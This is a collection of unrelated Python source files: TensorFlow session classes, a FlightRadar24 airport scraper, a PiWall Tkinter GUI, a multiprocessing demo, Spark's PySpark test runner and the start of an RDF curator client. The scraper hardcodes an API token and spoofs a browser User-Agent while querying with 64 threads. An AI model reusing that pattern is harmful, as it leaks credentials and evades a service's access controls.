for device placement, and log the resulting placement decisions,
create a session as follows:
```python
# Launch the graph in a session that allows soft device placement and
# logs the placement decisions.
sess = tf.compat.v1.Session(config=tf.compat.v1.ConfigProto(
allow_soft_placement=True,
log_device_placement=True))
```
"""
def __init__(self, target='', graph=None, config=None):
"""Creates a new TensorFlow session.
If no `graph` argument is specified when constructing the session,
the default graph will be launched in the session. If you are
using more than one graph (created with `tf.Graph()`) in the same
process, you will have to use different sessions for each graph,
but each graph can be used in multiple sessions. In this case, it
is often clearer to pass the graph to be launched explicitly to
the session constructor.
Args:
target: (Optional.) The execution engine to connect to. Defaults to using
an in-process engine. See
[Distributed TensorFlow](https://tensorflow.org/deploy/distributed) for
more examples.
graph: (Optional.) The `Graph` to be launched (described above).
config: (Optional.) A
[`ConfigProto`](https://www.tensorflow.org/code/tensorflow/core/protobuf/config.proto)
protocol buffer with configuration options for the session.
"""
super(Session, self).__init__(target, graph, config=config)
# NOTE(mrry): Create these on first `__enter__` to avoid a reference cycle.
self._default_graph_context_manager = None
self._default_session_context_manager = None
def __enter__(self):
if self._default_graph_context_manager is None:
self._default_graph_context_manager = self.graph.as_default()
else:
raise RuntimeError('Session context managers are not re-entrant. '
'Use `Session.as_default()` if you want to enter '
'a session multiple times.')
if self._default_session_context_manager is None:
self._default_session_context_manager = self.as_default()
self._default_graph_context_manager.__enter__()
return self._default_session_context_manager.__enter__()
def __exit__(self, exec_type, exec_value, exec_tb):
if exec_type is errors.OpError:
logging.error('Session closing due to OpError: %s', (exec_value,))
try:
self._default_session_context_manager.__exit__(exec_type, exec_value,
exec_tb)
except RuntimeError as error:
if error == exec_value:
# NOTE(skyewm): for some reason, in Python3,
# _default_session_context_manager.__exit__ will re-raise the "not
# re-entrant" exception raised in __enter__ above (note that if we're
# here, we're in the outer session context manager, since __exit__ is
# not called when __enter__ raises an exception). We still want to
# continue cleaning up this context manager before the exception is
# further propagated, so we ignore it here (note that it'll continue
# being propagated after this method completes).
pass
else:
raise
self._default_graph_context_manager.__exit__(exec_type, exec_value, exec_tb)
self._default_session_context_manager = None
self._default_graph_context_manager = None
# If we are closing due to an exception, set a time limit on our Close() to
# avoid blocking forever.
# TODO(b/120204635) remove this when deadlock is fixed.
if exec_type:
close_thread = threading.Thread(
name='SessionCloseThread', target=self.close)
close_thread.daemon = True
close_thread.start()
close_thread.join(30.0)
if close_thread.is_alive():
logging.error(
'Session failed to close after 30 seconds. Continuing after this '
'point may leave your program in an undefined state.')
else:
self.close()
@staticmethod
def reset(target, containers=None, config=None):
"""Resets resource containers on `target`, and close all connected sessions.
A resource container is distributed across all workers in the
same cluster as `target`. When a resource container on `target`
is reset, resources associated with that container will be cleared.
In particular, all Variables in the container will become undefined:
they lose their values and shapes.
NOTE:
(i) reset() is currently only implemented for distributed sessions.
(ii) Any sessions on the master named by `target` will be closed.
If no resource containers are provided, all containers are reset.
Args:
target: The execution engine to connect to.
      containers: A list of resource container name strings, or `None` if all
        the containers are to be reset.
config: (Optional.) Protocol buffer with configuration options.
Raises:
tf.errors.OpError: Or one of its subclasses if an error occurs while
resetting containers.
"""
if target is not None:
target = compat.as_bytes(target)
if containers is not None:
containers = [compat.as_bytes(c) for c in containers]
else:
containers = []
tf_session.TF_Reset(target, containers, config)
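  # Example of `reset` (a sketch; the gRPC target and container name are
  # hypothetical, and reset() only works against distributed runtimes):
  #   tf.compat.v1.Session.reset('grpc://worker0:2222', containers=['ps_vars'])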
@tf_export(v1=['InteractiveSession'])
class InteractiveSession(BaseSession):
"""A TensorFlow `Session` for use in interactive contexts, such as a shell.
The only difference with a regular `Session` is that an `InteractiveSession`
installs itself as the default session on construction.
The methods `tf.Tensor.eval`
and `tf.Operation.run`
will use that session to run ops.
This is convenient in interactive shells and [IPython
notebooks](http://ipython.org), as it avoids having to pass an explicit
`Session` object to run ops.
For example:
```python
sess = tf.compat.v1.InteractiveSession()
a = tf.constant(5.0)
b = tf.constant(6.0)
c = a * b
# We can just use 'c.eval()' without passing 'sess'
print(c.eval())
sess.close()
```
Note that a regular session installs itself as the default session when it
is created in a `with` statement. The common usage in non-interactive
programs is to follow that pattern:
```python
a = tf.constant(5.0)
b = tf.constant(6.0)
c = a * b
with tf.compat.v1.Session():
# We can also use 'c.eval()' here.
print(c.eval())
```
"""
_count_lock = threading.Lock()
_active_session_count = 0 # GUARDED_BY(_count_lock)
def __init__(self, target='', graph=None, config=None):
"""Creates a new interactive TensorFlow session.
If no `graph` argument is specified when constructing the session,
the default graph will be launched in the session. If you are
using more than one graph (created with `tf.Graph()`) in the same
process, you will have to use different sessions for each graph,
but each graph can be used in multiple sessions. In this case, it
is often clearer to pass the graph to be launched explicitly to
the session constructor.
Args:
target: (Optional.) The execution engine to connect to. Defaults to using
an in-process engine.
graph: (Optional.) The `Graph` to be launched (described above).
config: (Optional) `ConfigProto` proto used to configure the session.
"""
if not config:
# If config is not provided, choose some reasonable defaults for
# interactive use:
#
# - Grow GPU memory as needed at the cost of fragmentation.
gpu_options = config_pb2.GPUOptions(allow_growth=True)
config = config_pb2.ConfigProto(gpu_options=gpu_options)
# Interactive sessions always place pruned graphs.
config.graph_options.place_pruned_graph = True
super(InteractiveSession, self).__init__(target, graph, config)
with InteractiveSession._count_lock:
if InteractiveSession._active_session_count > 0:
warnings.warn('An interactive session is already active. This can '
'cause out-of-memory errors in some cases. You must '
'explicitly call `InteractiveSession.close()` to release '
'resources held by the other session(s).')
InteractiveSession._active_session_count += 1
# NOTE(mrry): We do not use `Session._closed` here because it has unhelpful
# semantics (in particular, it is not set to true if `Session.close()` is
# called on a session that has not been "opened" by running a step) and we
# cannot change those semantics without breaking existing code.
self._explicitly_closed = False
self._default_session = self.as_default()
self._default_session.enforce_nesting = False
self._default_session.__enter__()
self._explicit_graph = graph
if self._explicit_graph is not None:
self._default_graph = graph.as_default()
self._default_graph.enforce_nesting = False
self._default_graph.__enter__()
def close(self):
"""Closes an `InteractiveSession`."""
super(InteractiveSession, self).close()
with InteractiveSession._count_lock:
if not self._explicitly_closed:
InteractiveSession._active_session_count -= 1
self._explicitly_closed = True
else:
return
if self._explicit_graph is not None:
self._default_graph.__exit__(None, None, None)
self._default_graph = None
self._default_session.__exit__(None, None, None)
self._default_session = None
|
loop_through_airport_multithread.py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Feb 26 14:49:33 2019
@author: Rafael Amancio Diegues
Collect all arrivals and depart data for each airport, writing it all in a file
"""
import requests, json
import threading
import csv
import math
import time, calendar
import os
def flightsInAirportRequest(IATAcode, page):
resp = APIrequest()
jsonParse = request2JSON(resp)
jsonFlightsNode = JSON2FlightNode(jsonParse)
if jsonFlightsNode == '':
FlightsFile.write('JSON reading error;' + str(resp.status_code) + ';' + resp.url + ';' + IATAcode + ';' + str(page) +
';' + str(resp.content) + '\n')
return
for i in range(len(jsonFlightsNode)):
flight = jsonFlightsNode[i]['flight']
        if flightDataFilter(flight):
            writeFlight2File(flight, jsonParse['result']['request']['code'])
def request2JSON(resp):
try:
jsonParse = json.loads(resp.text)
    except ValueError:
jsonParse = ''
return jsonParse
def JSON2FlightNode(JSON):
try:
flightNode = JSON['result']['response']['airport']['pluginData']['schedule'][parametersRequest['plugin-setting[schedule][mode]']]['data']
    except (KeyError, TypeError):
flightNode = ''
return flightNode
def flightDataFilter(flight):
    # Only keep one day's worth of flights; skip those still marked 'scheduled'.
    '''Filtering, excluding some data'''
    # Only the last day (disabled draft kept below):
'''flight_timestamp = flight['time']['scheduled']['departure']
current_time = time.gmtime()
yesterday_timestamp = calendar.timegm((current_time.tm_year, current_time.tm_mon, current_time.tm_mday - 1,
0, 0, 0, current_time.tm_wday -1, current_time.tm_yday, current_time.tm_isdst))
today_timestamp = calendar.timegm((current_time.tm_year, current_time.tm_mon, current_time.tm_mday,
0, 0, 0, current_time.tm_wday, current_time.tm_yday, current_time.tm_isdst))
#if not( yesterday_timestamp < flight_timestamp and flight_timestamp < today_timestamp): continue'''
return True
def airportsChunkThread(start, end, AirportsList):
if testMode == 1:
parametersRequest['page'] = 0
parametersRequest['plugin-setting[schedule][mode]'] = 'arrivals'
for airportRow in range(start,start+1):
IATAcode = AirportsList[airportRow][2][0:3].lower()
parametersRequest['code'] = IATAcode
print('Airport number ' + str(airportRow) )
flightsInAirportRequest(IATAcode, 0)
else:
for pageNumber in range(1,-10, -1):
parametersRequest['page'] = pageNumber
for j in ['arrivals']:#, 'departures']:
parametersRequest['plugin-setting[schedule][mode]'] = j
for airportRow in range(start, end, 1):
IATAcode = AirportsList[airportRow][2][0:3].lower()
parametersRequest['code'] = IATAcode
#print('\033[H\033[J')
print('Page number: {0} Airport number: {1:>4} Airport code: {2}'.format(
str(pageNumber), str(airportRow), IATAcode))
flightsInAirportRequest(IATAcode, pageNumber)
def writeFlight2File(flight, IATAcode):
# Mapping through the dict
flightMappingKeys = [['identification','number','default'],
['status','text'],
['aircraft','model','text'],
['aircraft','registration'],
['owner','name'],
['airline','name'],
['airport','origin','code','iata'],
['airport','origin','info','terminal'],
['airport','origin','info','gate'],
['airport','destination','code','iata'],
['airport','destination','info','terminal'],
['airport','destination','info','gate'],
['time','scheduled','departure'],
['time','scheduled','arrival'],
['time','real','departure'],
['time','real','arrival'],
['time','other','duration']]
flightDataToPrint = []
for keys in flightMappingKeys:
try:
flightParameter = dictNavigate(flight, keys)
        except (KeyError, TypeError):
if 'iata' in keys:
flightParameter = IATAcode
else:
flightParameter = 'Null'
flightDataToPrint.append(flightParameter)
# Printing the file
flightPrintFormat = ''
for i in range(len(flightMappingKeys)):
flightPrintFormat = flightPrintFormat + '{d[' + str(i) + ']};'
    flightPrintFormat = flightPrintFormat[:-1] + '\n'
    FlightsFile.write(flightPrintFormat.format(d = flightDataToPrint))
def dictNavigate(dic, Keys):
result = dic
for k in Keys:
result = result[k]
return result
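# Example: dictNavigate({'a': {'b': 1}}, ['a', 'b']) returns 1; a missing key
# raises KeyError, which writeFlight2File above converts to 'Null'.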
def APIrequest():
resp = requests.get('https://api.flightradar24.com/common/v1/airport.json',
headers = headersRequest, params = parametersRequest)
if resp.status_code != 200:
resp = requests.get(resp.url, headers = headersRequest)
return resp
if __name__ == '__main__':
startTime = time.time()
testMode = 0
# Importing the csv file to a matrix
scriptDirectory = os.path.dirname(__file__)
AirportsFile = open(os.path.join(scriptDirectory,'data/Airports_list.csv'), 'r')
AirportsList = list(csv.reader(AirportsFile))
if testMode == 1:
AirportsList = [['', '', 'EZE', '', '', ''], ['', '', 'GRU', '', '', '']]
    # Creating and setting up the new file where the data will be written
FlightsFile = open(os.path.join(scriptDirectory,'data/flight_data.txt'),'w', encoding='utf-8')
formatFlightsStr = '{0};{1};{2};{3};{4};{5};{6};{7};{8};{9};{10};{11};{12};{13};{14};{15};{16}\n'
FlightsFile.write(formatFlightsStr.format('Flight number', 'Status', 'Airplane Model', 'Airplane registration', 'Airplane owner', 'Airline',
'Origin', 'Origin Terminal', 'Origin Gate', 'Destination', 'Destination Terminal', 'Destination Gate',
'Scheduled departure', 'Scheduled arrival', 'Real departure', 'Real arrival', 'Duration'))
# Setting internet parameters
headersRequest = {'Host': 'api.flightradar24.com',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0'}
currentTimestamp = calendar.timegm(time.gmtime())
parametersRequest = {'code': '', 'plugin[]': '', 'plugin-setting[schedule][mode]': 'arrivals',
'plugin-settings[schedule][timestamp]': str(currentTimestamp), 'page': '0', 'limit': '100',
'token': 'OqXb3FuvDi5WJmBHxxrEo27LzBKwU1VWO7-ITM9ASec'}
    # Multithreading processing
threadsCount = 64 # Basic formula: 2 * (number of cores)
jobsCount = len(AirportsList)
threadsList = []
for i in range(threadsCount):
start = math.floor(i * jobsCount / threadsCount)
end = math.floor((i + 1) * jobsCount / threadsCount)
        threadsList.append(threading.Thread(target=airportsChunkThread, args=(start, end, AirportsList)))
# Executing the threads
for thread in threadsList:
thread.start()
for thread in threadsList:
thread.join()
# Ending
AirportsFile.close()
FlightsFile.close()
elapsedTime = time.time() - startTime
print('The total elapsed time was ' + str(elapsedTime))
|
main.py
|
"""
GUI Application to control the PiWall from
"""
#!/usr/bin/python3
# Author: Gunnar Holwerda
# GUI to control a PiWall
from tkinter import Frame, StringVar, OptionMenu, Listbox, Button, Label, Tk, END
from piwallcontroller.piwallcontroller import PiWallController
from piwallcontroller.playlist import Playlist
from threading import Thread
class SelectorWindow(Frame):
"""
GUI Class extending the tkinter.Frame class
"""
TIMEOUTS = {
'1 hour ': 3600,
'2 hours': 7200,
'3 hours': 10800,
'Infinite': -1,
}
def __init__(self, master=None):
Frame.__init__(self, master)
self.__playlist = Playlist()
self.__controller = PiWallController()
self.__dropdown_selection = StringVar()
self.__timeout_selection = StringVar()
self.__command_thread = Thread(
target=self.__controller.run_commands, args=(self.__playlist,))
self.grid()
self.create_video_file_dropdown()
self.create_timeout_dropdown()
self.create_display_box()
self.create_add_button()
self.create_delete_button()
self.create_play_button()
self.create_reboot_button()
self.create_status_label()
self.create_stop_button()
def create_video_file_dropdown(self):
"""
        Creates the dropdown that displays the available video files
"""
videos = self.__controller.get_video_file_list()
if videos:
self.__dropdown_selection.set(videos[0])
else:
videos.append(None)
self.video_dropdown = OptionMenu(
None, self.__dropdown_selection, *videos)
self.video_dropdown.config(width=10)
self.video_dropdown.grid(row=0, column=0)
def create_timeout_dropdown(self):
"""
Creates the dropdown that displays the timeouts
"""
timeouts = list(self.TIMEOUTS.keys())
timeouts.sort()
self.__timeout_selection.set(timeouts[0])
self.timeout_dropdown = OptionMenu(
None, self.__timeout_selection, *timeouts)
self.timeout_dropdown.config(width=5)
self.timeout_dropdown.grid(row=0, column=1)
def create_display_box(self):
"""
Creates display box that displays all current items in the playlist
"""
self.display_box = Listbox(width=30, height=10)
self.display_box.grid(row=0, column=2, columnspan=2)
def create_play_button(self):
"""
Creates the play button
"""
self.submit_button = Button(text="Play", width=10)
self.submit_button['command'] = self.play_wall
self.submit_button.grid(row=1, column=2, pady=5)
def create_add_button(self):
"""
        Creates the button that adds the current values of the video and timeout
        dropdowns to the playlist
"""
self.add_button = Button(text='Add', fg='green', width=10)
self.add_button['command'] = self.update_display_box
self.add_button.grid(row=1, column=0, pady=5)
def create_delete_button(self):
"""
        Creates the delete button to remove items from the display box
"""
self.delete_button = Button(text='Delete', fg='red', width=10)
self.delete_button['command'] = self.delete_selected_item
self.delete_button.grid(row=1, column=1, pady=5)
def create_reboot_button(self):
"""
        Creates the button that reboots the Pis
"""
self.reboot_button = Button(text='Reboot Tiles', fg='red', width=10)
self.reboot_button['command'] = self.reboot_pressed
self.reboot_button.grid(row=1, column=3, pady=5)
def create_status_label(self):
"""
Creates label to display current status of the wall
"""
self.status_label = Label(relief="ridge", width=11)
self.set_status_label(0)
self.status_label.grid(row=2, column=3, pady=5)
def create_stop_button(self):
"""
Creates stop button to stop PiWall
"""
self.stop_button = Button(text='Stop Playing')
self.set_status_label(0)
self.stop_button['command'] = self.stop_pressed
self.stop_button.grid(row=2, column=2, pady=5)
def delete_selected_item(self):
"""
        Deletes the currently selected item from the display box
"""
self.__playlist.remove_playlist_item(self.display_box.curselection())
self.display_box.delete(self.display_box.curselection())
def play_wall(self):
"""
        Submits the playlist to be played on the Pis
"""
if self.__playlist.is_empty():
return
self.set_status_label(1)
self.display_box.delete(0, END)
# If there is a thread running, we need to stop the wall, which will
# end the thread
        if self.__command_thread.is_alive():
print("Stopping Wall")
self.__controller.stop_wall()
self.__command_thread.join()
self.__command_thread = Thread(
target=self.__controller.run_commands, args=(self.__playlist,))
self.__command_thread.start()
def update_display_box(self):
"""
Button listener for the Add Button (create_add_button)
"""
video_file = self.__dropdown_selection.get()
timeout = self.__timeout_selection.get()
self.__playlist.add_playlist_item(video_file, self.TIMEOUTS[timeout])
self.display_box.insert(END, "{0} {1}".format(timeout, video_file))
def stop_pressed(self):
"""
Button listener for the Stop Button (create_stop_button)
"""
self.__controller.stop_wall()
self.set_status_label(0)
def reboot_pressed(self):
"""
Button listener for the Reboot Button (create_reboot_button)
"""
self.set_status_label(0)
self.__controller.reboot_pis()
return True
def set_status_label(self, state):
"""
Updates the status label to the current status of the PiWall
"""
if state == 1:
self.status_label.config(text='Playing', fg='green')
return True
elif state == 0:
self.status_label.config(text='Not Playing', fg='red')
return True
else:
            raise Exception(
                'Status label state {0} not supported. Try 0 or 1'.format(state))
def get_controller(self):
"""
        Returns the PiWallController instance
"""
return self.__controller
# Run the GUI
if __name__ == "__main__":
tk_window = Tk(className="PiWall")
frame = SelectorWindow(master=tk_window)
tk_window.mainloop()
frame.get_controller().stop_wall()
|
hdf5_Hyst_parallel.py
|
import glob, os, sys
import h5py
import numpy as np
import matplotlib.pyplot as plt
import multiprocessing
def info(title):
print(title)
print('module name:', __name__)
print('parent process:', os.getppid())
print('process id:', os.getpid())
def f(name):
info('function f')
print('hello', name)
def f2(x):
return x*x
if __name__ == '__main__':
info('main line')
y=[1,2,3]
    p = multiprocessing.Process(target=f2, args=(1,))
p.start()
p.join()
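    # Note: Process discards f2's return value. To actually collect results,
    # a Pool is the usual sketch:
    #   with multiprocessing.Pool(2) as pool:
    #       print(pool.map(f2, y))  # -> [1, 4, 9]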
|
run-tests.py
|
#!/usr/bin/env python3
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
from argparse import ArgumentParser
import os
import re
import shutil
import subprocess
import sys
import tempfile
from threading import Thread, Lock
import time
import uuid
if sys.version < '3':
import Queue
else:
import queue as Queue
from multiprocessing import Manager
# Append `SPARK_HOME/dev` to the Python path so that we can import the sparktestsupport module
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), "../dev/"))
from sparktestsupport import SPARK_HOME # noqa (suppress pep8 warnings)
from sparktestsupport.shellutils import which, subprocess_check_output # noqa
from sparktestsupport.modules import all_modules, pyspark_sql # noqa
python_modules = dict((m.name, m) for m in all_modules if m.python_test_goals if m.name != 'root')
def print_red(text):
print('\033[31m' + text + '\033[0m')
SKIPPED_TESTS = Manager().dict()
LOG_FILE = os.path.join(SPARK_HOME, "python/unit-tests.log")
FAILURE_REPORTING_LOCK = Lock()
LOGGER = logging.getLogger()
# Find out where the assembly jars are located.
# TODO: revisit for Scala 2.13
for scala in ["2.12"]:
build_dir = os.path.join(SPARK_HOME, "assembly", "target", "scala-" + scala)
if os.path.isdir(build_dir):
SPARK_DIST_CLASSPATH = os.path.join(build_dir, "jars", "*")
break
else:
raise Exception("Cannot find assembly build directory, please build Spark first.")
def run_individual_python_test(target_dir, test_name, pyspark_python):
env = dict(os.environ)
env.update({
'SPARK_DIST_CLASSPATH': SPARK_DIST_CLASSPATH,
'SPARK_TESTING': '1',
'SPARK_PREPEND_CLASSES': '1',
'PYSPARK_PYTHON': which(pyspark_python),
'PYSPARK_DRIVER_PYTHON': which(pyspark_python)
})
# Create a unique temp directory under 'target/' for each run. The TMPDIR variable is
# recognized by the tempfile module to override the default system temp directory.
tmp_dir = os.path.join(target_dir, str(uuid.uuid4()))
while os.path.isdir(tmp_dir):
tmp_dir = os.path.join(target_dir, str(uuid.uuid4()))
os.mkdir(tmp_dir)
env["TMPDIR"] = tmp_dir
# Also override the JVM's temp directory by setting driver and executor options.
java_options = "-Djava.io.tmpdir={0} -Dio.netty.tryReflectionSetAccessible=true".format(tmp_dir)
spark_args = [
"--conf", "spark.driver.extraJavaOptions='{0}'".format(java_options),
"--conf", "spark.executor.extraJavaOptions='{0}'".format(java_options),
"pyspark-shell"
]
env["PYSPARK_SUBMIT_ARGS"] = " ".join(spark_args)
LOGGER.info("Starting test(%s): %s", pyspark_python, test_name)
start_time = time.time()
try:
per_test_output = tempfile.TemporaryFile()
retcode = subprocess.Popen(
[os.path.join(SPARK_HOME, "bin/pyspark")] + test_name.split(),
stderr=per_test_output, stdout=per_test_output, env=env).wait()
shutil.rmtree(tmp_dir, ignore_errors=True)
except:
LOGGER.exception("Got exception while running %s with %s", test_name, pyspark_python)
# Here, we use os._exit() instead of sys.exit() in order to force Python to exit even if
# this code is invoked from a thread other than the main thread.
os._exit(1)
duration = time.time() - start_time
# Exit on the first failure.
if retcode != 0:
try:
with FAILURE_REPORTING_LOCK:
with open(LOG_FILE, 'ab') as log_file:
per_test_output.seek(0)
log_file.writelines(per_test_output)
per_test_output.seek(0)
for line in per_test_output:
decoded_line = line.decode("utf-8", "replace")
if not re.match('[0-9]+', decoded_line):
print(decoded_line, end='')
per_test_output.close()
except:
LOGGER.exception("Got an exception while trying to print failed test output")
finally:
print_red("\nHad test failures in %s with %s; see logs." % (test_name, pyspark_python))
# Here, we use os._exit() instead of sys.exit() in order to force Python to exit even if
# this code is invoked from a thread other than the main thread.
os._exit(-1)
else:
skipped_counts = 0
try:
per_test_output.seek(0)
            # This expects skipped-test output from unittest when the verbosity
            # level is 2 (i.e., the --verbose option is enabled).
decoded_lines = map(lambda line: line.decode("utf-8", "replace"), iter(per_test_output))
skipped_tests = list(filter(
lambda line: re.search(r'test_.* \(pyspark\..*\) ... (skip|SKIP)', line),
decoded_lines))
skipped_counts = len(skipped_tests)
if skipped_counts > 0:
key = (pyspark_python, test_name)
SKIPPED_TESTS[key] = skipped_tests
per_test_output.close()
except:
import traceback
print_red("\nGot an exception while trying to store "
"skipped test output:\n%s" % traceback.format_exc())
# Here, we use os._exit() instead of sys.exit() in order to force Python to exit even if
# this code is invoked from a thread other than the main thread.
os._exit(-1)
if skipped_counts != 0:
LOGGER.info(
"Finished test(%s): %s (%is) ... %s tests were skipped", pyspark_python, test_name,
duration, skipped_counts)
else:
LOGGER.info(
"Finished test(%s): %s (%is)", pyspark_python, test_name, duration)
def get_default_python_executables():
python_execs = [x for x in ["python3.6", "python2.7", "pypy"] if which(x)]
if "python3.6" not in python_execs:
p = which("python3")
if not p:
LOGGER.error("No python3 executable found. Exiting!")
os._exit(1)
else:
python_execs.insert(0, p)
return python_execs
def parse_opts():
parser = ArgumentParser(
prog="run-tests"
)
parser.add_argument(
"--python-executables", type=str, default=','.join(get_default_python_executables()),
help="A comma-separated list of Python executables to test against (default: %(default)s)"
)
parser.add_argument(
"--modules", type=str,
default=",".join(sorted(python_modules.keys())),
help="A comma-separated list of Python modules to test (default: %(default)s)"
)
parser.add_argument(
"-p", "--parallelism", type=int, default=4,
help="The number of suites to test in parallel (default %(default)d)"
)
parser.add_argument(
"--verbose", action="store_true",
help="Enable additional debug logging"
)
group = parser.add_argument_group("Developer Options")
group.add_argument(
"--testnames", type=str,
default=None,
help=(
"A comma-separated list of specific modules, classes and functions of doctest "
"or unittest to test. "
"For example, 'pyspark.sql.foo' to run the module as unittests or doctests, "
"'pyspark.sql.tests FooTests' to run the specific class of unittests, "
"'pyspark.sql.tests FooTests.test_foo' to run the specific unittest in the class. "
"'--modules' option is ignored if they are given.")
)
args, unknown = parser.parse_known_args()
if unknown:
parser.error("Unsupported arguments: %s" % ' '.join(unknown))
if args.parallelism < 1:
parser.error("Parallelism cannot be less than 1")
return args
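# Example invocation (a sketch; the module name must match one defined in
# sparktestsupport.modules):
#   python/run-tests.py --modules=pyspark-sql --parallelism=8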
def _check_coverage(python_exec):
    # Make sure coverage is installed.
try:
subprocess_check_output(
[python_exec, "-c", "import coverage"],
stderr=open(os.devnull, 'w'))
except:
print_red("Coverage is not installed in Python executable '%s' "
"but 'COVERAGE_PROCESS_START' environment variable is set, "
"exiting." % python_exec)
sys.exit(-1)
def main():
opts = parse_opts()
if opts.verbose:
log_level = logging.DEBUG
else:
log_level = logging.INFO
should_test_modules = opts.testnames is None
logging.basicConfig(stream=sys.stdout, level=log_level, format="%(message)s")
LOGGER.info("Running PySpark tests. Output is in %s", LOG_FILE)
if os.path.exists(LOG_FILE):
os.remove(LOG_FILE)
python_execs = opts.python_executables.split(',')
LOGGER.info("Will test against the following Python executables: %s", python_execs)
if should_test_modules:
modules_to_test = []
for module_name in opts.modules.split(','):
if module_name in python_modules:
modules_to_test.append(python_modules[module_name])
else:
print("Error: unrecognized module '%s'. Supported modules: %s" %
(module_name, ", ".join(python_modules)))
sys.exit(-1)
LOGGER.info("Will test the following Python modules: %s", [x.name for x in modules_to_test])
else:
testnames_to_test = opts.testnames.split(',')
LOGGER.info("Will test the following Python tests: %s", testnames_to_test)
task_queue = Queue.PriorityQueue()
for python_exec in python_execs:
# Check if the python executable has coverage installed when 'COVERAGE_PROCESS_START'
# environmental variable is set.
if "COVERAGE_PROCESS_START" in os.environ:
_check_coverage(python_exec)
python_implementation = subprocess_check_output(
[python_exec, "-c", "import platform; print(platform.python_implementation())"],
universal_newlines=True).strip()
LOGGER.debug("%s python_implementation is %s", python_exec, python_implementation)
LOGGER.debug("%s version is: %s", python_exec, subprocess_check_output(
[python_exec, "--version"], stderr=subprocess.STDOUT, universal_newlines=True).strip())
if should_test_modules:
for module in modules_to_test:
if python_implementation not in module.blacklisted_python_implementations:
for test_goal in module.python_test_goals:
heavy_tests = ['pyspark.streaming.tests', 'pyspark.mllib.tests',
'pyspark.tests', 'pyspark.sql.tests', 'pyspark.ml.tests']
if any(map(lambda prefix: test_goal.startswith(prefix), heavy_tests)):
priority = 0
else:
priority = 100
task_queue.put((priority, (python_exec, test_goal)))
else:
for test_goal in testnames_to_test:
task_queue.put((0, (python_exec, test_goal)))
# Create the target directory before starting tasks to avoid races.
target_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), 'target'))
if not os.path.isdir(target_dir):
os.mkdir(target_dir)
def process_queue(task_queue):
while True:
try:
(priority, (python_exec, test_goal)) = task_queue.get_nowait()
except Queue.Empty:
break
try:
run_individual_python_test(target_dir, test_goal, python_exec)
finally:
task_queue.task_done()
start_time = time.time()
for _ in range(opts.parallelism):
worker = Thread(target=process_queue, args=(task_queue,))
worker.daemon = True
worker.start()
try:
task_queue.join()
except (KeyboardInterrupt, SystemExit):
print_red("Exiting due to interrupt")
sys.exit(-1)
total_duration = time.time() - start_time
LOGGER.info("Tests passed in %i seconds", total_duration)
for key, lines in sorted(SKIPPED_TESTS.items()):
pyspark_python, test_name = key
LOGGER.info("\nSkipped tests in %s with %s:" % (test_name, pyspark_python))
for line in lines:
LOGGER.info(" %s" % line.rstrip())
if __name__ == "__main__":
main()
|
__init__.py
|
"""
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
This file is part of the Smart Developer Hub Project:
http://www.smartdeveloperhub.org
Center for Open Middleware
http://www.centeropenmiddleware.com/
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
Copyright (C) 2015 Center for Open Middleware.
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
"""
import json
from abc import abstractproperty, ABCMeta
from urlparse import urlparse
from pika.exceptions import ChannelClosed
__author__ = 'Fernando Serena'
import StringIO
import uuid
import logging
import pika
from rdflib import Graph, RDF, Literal, BNode, URIRef
from rdflib.namespace import Namespace, FOAF, XSD
from agora.client.wrapper import Agora
import time
from threading import Thread
from datetime import datetime
log = logging.getLogger('sdh.curator.client')
CURATOR = Namespace('http://www.smartdeveloperhub.org/vocabulary/curator#')
TYPES = Namespace('http://www.smartdeveloperhub.org/vocabulary/types#')
AMQP = Namespace('http://www.smartdeveloperhub.org/vocabulary/amqp#')
class RequestGraph(Graph):
__metaclass__ = ABCMeta
def __init__(self):
super(RequestGraph, self).__init__()
self._request_node = BNode()
self._agent_node = BNode()
self._broker_node = BNode()
self._channel_node = BNode()
self._message_id = self._agent_id = self._submitted_on = self._exchange_name = None
self._routing_key = self._broker_host = self._broker_port = self._broker_vh = None
# Node binding
self.add((self.request_node, CURATOR.replyTo, self.channel_node))
self.add((self.request_node, CURATOR.submittedBy, self.agent_node))
self.add((self.channel_node, RDF.type, CURATOR.DeliveryChannel))
self.add((self.broker_node, RDF.type, AMQP.Broker))
self.add((self.channel_node, AMQP.broker, self.broker_node))
self.add((self.agent_node, RDF.type, FOAF.Agent))
# Default graph
self.message_id = uuid.uuid4()
self.submitted_on = datetime.now()
self.agent_id = uuid.uuid4()
self.exchange_name = ""
self.routing_key = ""
self.broker_host = "localhost"
self.broker_port = 5672
self.broker_vh = "/"
self.bind('curator', CURATOR)
self.bind('amqp', AMQP)
self.bind('foaf', FOAF)
self.bind('types', TYPES)
@property
def request_node(self):
return self._request_node
@property
def broker_node(self):
return self._broker_node
@property
def channel_node(self):
return self._channel_node
@property
def agent_node(self):
return self._agent_node
@property
def message_id(self):
return self._message_id
@abstractproperty
def type(self):
pass
@message_id.setter
def message_id(self, value):
